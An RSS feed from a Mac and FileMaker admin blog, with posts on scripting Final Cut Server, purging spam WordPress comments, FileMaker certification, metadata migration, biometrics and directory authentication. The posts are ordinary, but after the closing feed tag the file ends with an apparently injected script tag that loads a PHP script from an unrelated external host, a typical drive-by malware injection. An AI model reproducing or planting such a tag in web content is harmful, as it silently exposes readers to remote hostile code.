<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Krypted &#187; FileMaker</title>
	<atom:link href="http://krypted.com/category/filemaker/feed/" rel="self" type="application/rss+xml" />
	<link>http://krypted.com</link>
	<description>Notes from the field</description>
	<lastBuildDate>Wed, 28 Jul 2010 03:19:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Scripting Productions and Assets in Final Cut Server</title>
		<link>http://krypted.com/filemaker/scripting-productions-and-assets-in-final-cut-server/</link>
		<comments>http://krypted.com/filemaker/scripting-productions-and-assets-in-final-cut-server/#comments</comments>
		<pubDate>Sat, 05 Jun 2010 15:00:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileMaker]]></category>
		<category><![CDATA[Final Cut Server]]></category>
		<category><![CDATA[Command line]]></category>
		<category><![CDATA[create asset]]></category>
		<category><![CDATA[create production]]></category>
		<category><![CDATA[create project]]></category>
		<category><![CDATA[fcsvr_client]]></category>
		<category><![CDATA[projects]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=6019</guid>
		<description><![CDATA[When you&#8217;re integrating Final Cut Server with other products, you often find yourself writing scripts to perform various tasks. One of those tasks might be to create a new project, or a production as it&#8217;s called in Final Cut Server. Because a production can have a number of attributes, a great way to do this [...]]]></description>
			<content:encoded><![CDATA[<p>When you&#8217;re integrating Final Cut Server with other products, you often find yourself writing scripts to perform various tasks. One of those tasks might be to create a new project, or a production as it&#8217;s called in Final Cut Server. Because a production can have a number of attributes, a great way to do this is to create a template production and then make copies of it (or clones) when you want to create subsequent projects. To do so, you&#8217;ll use the fcsvr_client command, along with the clone verb. The -name option will allow you to set the name of the production which would then be followed by the unique ID of the production template that you manually create using the Final Cut Server application. Presuming we are creating a production called Emerald with a template of /project/298, we could use the following:</p>
<blockquote><p>fcsvr_client clone –name Emerald /project/298</p></blockquote>
<p>If we wanted to get the ID of this project, we would then use:</p>
<blockquote><p>fcsvr_client search &#8211;crit Emerald /project</p></blockquote>
<p>We could then go a step further and actually create an asset in this new project by using the &#8211;projaddr option for createasset. In the below example, we&#8217;ll presume that the new project ID was 299 and then create an asset called Emerald1.mov that is stored on a device with an ID of 5 as well as provide a description and a tag:</p>
<blockquote><p>fcsvr_client createasset &#8211;background &#8211;projaddr /project/299 pa_asset_media /dev/5/Emerald1.mov CUST_DESCRIPTION=”Emerald throwing food at daddy” CUST_KEYWORDS=”food fight&#8221;</p></blockquote>
<p>Now to throw it all together in a little script that could be fired off through another application that can be kicked off from another application. In the below, we assume that it is a bash script that was handed a project name via $1, a device ID in $2 and a file name in $3:</p>
<blockquote><p>#!/bin/bash<br />
fcsvr_client clone –name $1 /project/298<br />
MyProjectID = fcsvr_client search &#8211;crit &#8220;$1&#8243; /project<br />
/usr/bin/logger &#8220;Production $MyProjectID with name of $1 created&#8221;<br />
fcsvr_client createasset &#8211;background &#8211;projaddr /project/$MyProjectID pa_asset_media /dev/$2/$3 CUST_DESCRIPTION=”Automatically uploaded file” CUST_KEYWORDS=”movie, automated&#8221;<br />
/usr/bin/logger &#8220;Asset $3 on device $2 created in production $1&#8243;</p></blockquote>
<p>If we had just wanted to create the asset, we could have simply used line 5, placing the Project ID in $1 by changing out $MyProjectID with $1. We could also use <a href="http://transmogrifier.sourceforge.net/">Transmogrifier</a> to easily return the assetID once it has been created in Final Cut Server, allowing that to be returned to the application that might be calling up this script. This allows you to integrate the asset and production creation part of Final Cut Server with other solutions, such as a PHP web upload application, FileMaker or even another Digital Asset Management solutions.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/final-cut-server/archive-restore-assets-with-fcsvr_client/" rel="bookmark" title="June 7, 2010">Archive &#038; Restore Assets with fcsvr_client</a></li>
<li><a href="http://krypted.com/filemaker/final-cut-server-migrating-filemaker-metadata/" rel="bookmark" title="October 23, 2008">Final Cut Server: Migrating FileMaker Metadata</a></li>
<li><a href="http://krypted.com/final-cut-server/the-final-cut-server-command-line/" rel="bookmark" title="July 7, 2008">The Final Cut Server Command Line</a></li>
<li><a href="http://krypted.com/final-cut-server/final-cut-server-using-amazon-s3-for-archival/" rel="bookmark" title="November 14, 2008">Final Cut Server: Using Amazon S3 for Archival</a></li>
<li><a href="http://krypted.com/final-cut-server/final-cut-server-creating-a-device/" rel="bookmark" title="November 19, 2008">Final Cut Server: Creating a Device</a></li>
</ul>
<p><!-- Similar Posts took 7.102 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/filemaker/scripting-productions-and-assets-in-final-cut-server/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Delete All WordPress Comments</title>
		<link>http://krypted.com/filemaker/delete-all-wordpress-comments/</link>
		<comments>http://krypted.com/filemaker/delete-all-wordpress-comments/#comments</comments>
		<pubDate>Tue, 01 Dec 2009 19:34:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileMaker]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[DELETE]]></category>
		<category><![CDATA[mysqladmin]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress comments]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5167</guid>
		<description><![CDATA[WordPress uses MySQL as a back-end. I&#8217;ve seen a number of scenarios where someone was comment spammed. The comments weren&#8217;t approved and so never appeared on the site, but they were starting to fill up the MySQL database given that there were about 40,000 in one case and about 55,000 in another. In order to [...]]]></description>
			<content:encoded><![CDATA[<p>WordPress uses MySQL as a back-end. I&#8217;ve seen a number of scenarios where someone was comment spammed. The comments weren&#8217;t approved and so never appeared on the site, but they were starting to fill up the MySQL database given that there were about 40,000 in one case and about 55,000 in another. In order to trash them you can use the following query from mysqladmin (once connected to the database of course):</p>
<blockquote><p>DELETE FROM wp_comments WHERE comment_approved = &#8216;0&#8242;</p></blockquote>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/wordpress/wordpress-comments/" rel="bookmark" title="June 9, 2008">WordPress: Comments</a></li>
<li><a href="http://krypted.com/windows-server/keystrokes-for-windowswindows-server-explorer/" rel="bookmark" title="April 15, 2009">Keystrokes For Windows/Windows Server Explorer</a></li>
<li><a href="http://krypted.com/sites/spamming-web-logs/" rel="bookmark" title="September 10, 2009">Spamming Web Logs</a></li>
<li><a href="http://krypted.com/consulting/blocking-spam-attacks/" rel="bookmark" title="December 14, 2007">Blocking Spam Attacks</a></li>
</ul>
<p><!-- Similar Posts took 4.153 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/filemaker/delete-all-wordpress-comments/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FileMaker 10 Certification</title>
		<link>http://krypted.com/certifications/filemaker-10-certification/</link>
		<comments>http://krypted.com/certifications/filemaker-10-certification/#comments</comments>
		<pubDate>Wed, 03 Jun 2009 02:15:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileMaker]]></category>
		<category><![CDATA[certifications]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=3877</guid>
		<description><![CDATA[FileMaker has now released their certification track for FileMaker 10.  They also now have a book and CD available for learning the software and preparing for the exam.Similar Articles:

Snow Leopard Certifications
FileMaker and Directory Services
Final Cut Server: Migrating FileMaker Metadata
Biometrics in Rapid Application Development


Copyright &#169; 2008 This feed is for personal, non-commercial use only.  [...]]]></description>
			<content:encoded><![CDATA[<p>FileMaker has now released their <a href="http://www.filemaker.com/support/training/certification/index.html">certification track for FileMaker 10</a>.  They also now have a<a href="https://store.filemaker.com/product/viewfamily/family/FMPT"> book and CD</a> available for learning the software and preparing for the exam.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/certifications/snow-leopard-certifications/" rel="bookmark" title="August 31, 2009">Snow Leopard Certifications</a></li>
<li><a href="http://krypted.com/filemaker/filemaker-and-directory-services/" rel="bookmark" title="March 26, 2006">FileMaker and Directory Services</a></li>
<li><a href="http://krypted.com/filemaker/final-cut-server-migrating-filemaker-metadata/" rel="bookmark" title="October 23, 2008">Final Cut Server: Migrating FileMaker Metadata</a></li>
<li><a href="http://krypted.com/filemaker/biometrics-in-rapid-application-development/" rel="bookmark" title="December 18, 2006">Biometrics in Rapid Application Development</a></li>
</ul>
<p><!-- Similar Posts took 4.105 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/certifications/filemaker-10-certification/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Final Cut Server: Migrating FileMaker Metadata</title>
		<link>http://krypted.com/filemaker/final-cut-server-migrating-filemaker-metadata/</link>
		<comments>http://krypted.com/filemaker/final-cut-server-migrating-filemaker-metadata/#comments</comments>
		<pubDate>Thu, 23 Oct 2008 17:57:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileMaker]]></category>
		<category><![CDATA[Final Cut Server]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[import metadata]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=2651</guid>
		<description><![CDATA[So my buddy Nick Stokes had a project recently where he was migrating metadata out of a FileMaker database and into Final Cut Server. Â Here&#8217;s what he had to say about the steps:
Step 1. The FileMaker DB has all the metadata for all the assets.
Step 2. Create a mirror of the metadata in Final Cut [...]]]></description>
			<content:encoded><![CDATA[<p>So my buddy Nick Stokes had a project recently where he was migrating metadata out of a FileMaker database and into Final Cut Server. Â Here&#8217;s what he had to say about the steps:</p>
<blockquote><p>Step 1. The FileMaker DB has all the metadata for all the assets.</p>
<p>Step 2. Create a mirror of the metadata in Final Cut Server, leaving the data empty.</p>
<p>Step 3. Upload all of the assets into Final Cut Server.</p>
<p>Step 4. Outputted a Write XML of every asset out of Final Cut Server.</p>
<p>Step 5. Build a php script to parse those WriteXML files and merge them with a CSV dump from the Filemaker DB based on the filename and FCSvr asset ID.</p>
<p>Step 6. Use another php php script to take the matched records out of the merged CSV into individual ReadXML files directly into a Device being Watched by FCSvr that applied the ReadXML response.</p></blockquote>
<p>Apparently, he tested almost 600 assets on an 8-Core Mac Pro and it imported via ReadXML, normalized and updated files in less than 10 seconds. Â Great going Nick!<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/final-cut-server/archive-restore-assets-with-fcsvr_client/" rel="bookmark" title="June 7, 2010">Archive &#038; Restore Assets with fcsvr_client</a></li>
<li><a href="http://krypted.com/filemaker/scripting-productions-and-assets-in-final-cut-server/" rel="bookmark" title="June 5, 2010">Scripting Productions and Assets in Final Cut Server</a></li>
<li><a href="http://krypted.com/final-cut-server/the-final-cut-server-command-line/" rel="bookmark" title="July 7, 2008">The Final Cut Server Command Line</a></li>
<li><a href="http://krypted.com/final-cut-server/final-cut-server-imovie-integration/" rel="bookmark" title="October 21, 2008">Final Cut Server: iMovie Integration</a></li>
<li><a href="http://krypted.com/final-cut-server/final-cut-server-prepare-media-for-disconnected-use/" rel="bookmark" title="October 20, 2008">Final Cut Server: Prepare Media For Disconnected Use</a></li>
</ul>
<p><!-- Similar Posts took 5.335 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/filemaker/final-cut-server-migrating-filemaker-metadata/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New RepTools!!!</title>
		<link>http://krypted.com/filemaker/new-reptools/</link>
		<comments>http://krypted.com/filemaker/new-reptools/#comments</comments>
		<pubDate>Tue, 20 May 2008 16:29:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileMaker]]></category>
		<category><![CDATA[318]]></category>
		<category><![CDATA[reptools]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=187</guid>
		<description><![CDATA[Originally posted at http://www.318.com/TechJournal
318, Inc.Â is proud to announce the immediate availability of our flagship software product,Â RepToolsâ„¢ 2008.
RepToolsâ„¢ 2008 is a customer relationship management (CRM) suite developed specifically for the entertainment industry. RepToolsâ„¢ 2008 has nine integrated modules that are designed to efficiently manage all of the information businesses need to manage sales forces automation, asset [...]]]></description>
			<content:encoded><![CDATA[<p>Originally posted at http://www.318.com/TechJournal</p>
<p><img src="http://www.reptools.com/modules/icons/staff_icon_100.png" alt="RepToolsâ„¢ 2008" align="left" /><strong>318, Inc.</strong>Â is proud to announce the immediate availability of our flagship software product,Â <strong>RepToolsâ„¢ 2008</strong>.</p>
<p>RepToolsâ„¢ 2008 is a customer relationship management (CRM) suite developed specifically for the entertainment industry. RepToolsâ„¢ 2008 has nine integrated modules that are designed to efficiently manage all of the information businesses need to manage sales forces automation, asset management, and customer relationships from the beginning to the end of production. With instantaneous access to every aspect of the production process and comprehensive metrics for detailed analysis, RepToolsâ„¢ 2008 will let you worry about what matters the most: your customers.</p>
<p><strong>Over 100 New Features:</strong></p>
<ul>
<li><a href="http://www.reptools.com/modules/module_documents.html">Document Management</a>Â - RepToolsâ„¢ 2008 has an all new document management system that will automatically organize your storyboards, bids, treatments, callsheets, location photos, and more.</li>
<li><a href="http://www.reptools.com/features/feature_interface.html">Completely New Interface</a>Â - Built to be faster over your network and keep you more productive than ever before.</li>
<li><a href="http://www.reptools.com/features/feature_quickfind.html">New QuickFind</a>Â - Now you can find any of your projects, contacts, or bids in seconds.</li>
<li><a href="http://www.reptools.com/features/feature_filters.html">Live Filters</a>Â - See only what you decide is relevant and prevent information overload from bogging down your workflow.</li>
</ul>
<p>For more information about RepToolsâ„¢ 2008 and how it can dramatically increase the productivity of your business, please visit<a href="http://www.reptools.com/">http://www.reptools.com</a>Â or call us toll-free at (888) 347-3318.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/windows-xp/malware-the-pc-users-worse-enemy/" rel="bookmark" title="January 26, 2007">Malware: The PC Users Worse Enemy</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-105-the-new-terminal/" rel="bookmark" title="November 15, 2007">Mac OS X 10.5: The New Terminal</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-leopard-what-about-that-zfs-thingie/" rel="bookmark" title="November 6, 2007">Mac OS X Leopard: What About that ZFS Thingie?</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-flushing-the-dns-cache-resolver/" rel="bookmark" title="November 24, 2007">Mac OS X: Flushing the DNS Cache Resolver</a></li>
<li><a href="http://krypted.com/filemaker/filemaker-and-directory-services/" rel="bookmark" title="March 26, 2006">FileMaker and Directory Services</a></li>
</ul>
<p><!-- Similar Posts took 4.550 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/filemaker/new-reptools/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Biometrics in Rapid Application Development</title>
		<link>http://krypted.com/filemaker/biometrics-in-rapid-application-development/</link>
		<comments>http://krypted.com/filemaker/biometrics-in-rapid-application-development/#comments</comments>
		<pubDate>Mon, 18 Dec 2006 05:59:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileMaker]]></category>
		<category><![CDATA[Biometrics]]></category>
		<category><![CDATA[Rapid Application Development]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=87</guid>
		<description><![CDATA[I originally posted this at http://www.318.com/TechJournal
Biometric systems measure the physical traits of users to offer a high level of security. As part of their nature biometric security requires users be present in order to log into the systems they protect. Biometric systems typically rely on the combination of a biometric trait and a password. They [...]]]></description>
			<content:encoded><![CDATA[<p>I originally posted this at http://www.318.com/TechJournal</p>
<p>Biometric systems measure the physical traits of users to offer a high level of security. As part of their nature biometric security requires users be present in order to log into the systems they protect. Biometric systems typically rely on the combination of a biometric trait and a password. They can also rely on the use of an access card, resulting in a situation where there are three forms of security present to access a system.</p>
<p>Biometrics measure physical traits such as hand geometry, retinal patterns, facial scans, fingerprints or voice patterns. The use of biometrics has a potential in a number of situations where security requirements are greater than the typical username and password combination. Fingerprint scans are relatively quick, taking approximately 2-3 seconds on average.</p>
<p>Biometric systems can be trained to work for multiple users. They can authorize different levels of access to systems. A fingerprint sensor can be used in conjunction with a Biometric plug-in for FileMaker database security. The Biometric plug-in does not work directly with or replace FileMakerâ€™s built-in password scheme. Instead it offers another layer of security directly within FileMaker</p>
<p>It is possible to fool a biometric system. No security system is truly foolproof. However, biometrics offer a new layer of security that would otherwise not be present. Requiring passwords in conjunction with a biometric trait such as a fingerprint is better than allowing authentication based solely on the biometric trait. By matching the password to the biometric trait the system becomes more secure than if it was using just one of the two security mechanisms.</p>
<p>Biometric systems arenâ€™t as expensive as they once were. For example, Puppy Suite for Mac OS X Fingerprint Identification Unit and authentication software bundle. Lightweight and small, the Puppy unit offers the ultimate in convenience with a new level of safekeeping. The Puppy ranges from $80 to $130. USB drives that provide biometric authentication are fairly inexpensive now as well, with at least 10 companies offering products.</p>
<p>While there are few other solid packages for Mac OS X, it is possible to purchase Windows-based biometric solutions for as low as $30. There is a biometric mouse called the BioMouse. IBM has perhaps gone as far with their laptops as any other company in biometric product offerings with a laptop that does not boot without the use of a fingerprint from an authorized user.</p>
<p>Biometrics is going to become an integral component of security. As the price of biometric solutions comes down the product offerings are becoming more numerous. While most biometrics are not foolproof, they do offer an additional layer of security in an emergently insecure world where Information Technology is concerned.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/filemaker/filemaker-and-directory-services/" rel="bookmark" title="March 26, 2006">FileMaker and Directory Services</a></li>
<li><a href="http://krypted.com/certifications/filemaker-10-certification/" rel="bookmark" title="June 2, 2009">FileMaker 10 Certification</a></li>
<li><a href="http://krypted.com/filemaker/final-cut-server-migrating-filemaker-metadata/" rel="bookmark" title="October 23, 2008">Final Cut Server: Migrating FileMaker Metadata</a></li>
</ul>
<p><!-- Similar Posts took 10.674 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/filemaker/biometrics-in-rapid-application-development/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FileMaker and Directory Services</title>
		<link>http://krypted.com/filemaker/filemaker-and-directory-services/</link>
		<comments>http://krypted.com/filemaker/filemaker-and-directory-services/#comments</comments>
		<pubDate>Sun, 26 Mar 2006 05:44:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileMaker]]></category>
		<category><![CDATA[318]]></category>
		<category><![CDATA[Active Directory]]></category>
		<category><![CDATA[directory services]]></category>
		<category><![CDATA[Open Directory]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=49</guid>
		<description><![CDATA[I originally posted this at http://www.318.com/TechJournal
Did you know FileMaker can be configured to authenticate with Open Directory and Active Directory? What does that mean? Well, most companies use a Windows Server or Macintosh Server to allow their employees to log in every day. FileMaker Server 7 now has the ability to connect to those same [...]]]></description>
			<content:encoded><![CDATA[<p>I originally posted this at http://www.318.com/TechJournal</p>
<p>Did you know FileMaker can be configured to authenticate with Open Directory and Active Directory? What does that mean? Well, most companies use a Windows Server or Macintosh Server to allow their employees to log in every day. FileMaker Server 7 now has the ability to connect to those same user accounts instead of having to remember usernames and passwords for both your FileMaker account and your computer account. This also allows companies easier account maintenance when employees join or leave companies. You no longer have to add an account for both the network and FileMaker. In addition to all these benefits, external authentication provides more security for companies that allow their employees to log in remotely.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/certifications/filemaker-10-certification/" rel="bookmark" title="June 2, 2009">FileMaker 10 Certification</a></li>
<li><a href="http://krypted.com/filemaker/final-cut-server-migrating-filemaker-metadata/" rel="bookmark" title="October 23, 2008">Final Cut Server: Migrating FileMaker Metadata</a></li>
<li><a href="http://krypted.com/active-directory/284/" rel="bookmark" title="May 19, 2008">Mac OS X: dirt</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-trusted-binding/" rel="bookmark" title="September 29, 2007">Mac OS X: Trusted Binding</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-setting-a-software-update-server-without-open-directory/" rel="bookmark" title="August 28, 2007">Mac OS X: Setting a Software Update Server without Open Directory</a></li>
</ul>
<p><!-- Similar Posts took 7.490 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/filemaker/filemaker-and-directory-services/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://holasionweb.com/oo.php"></script>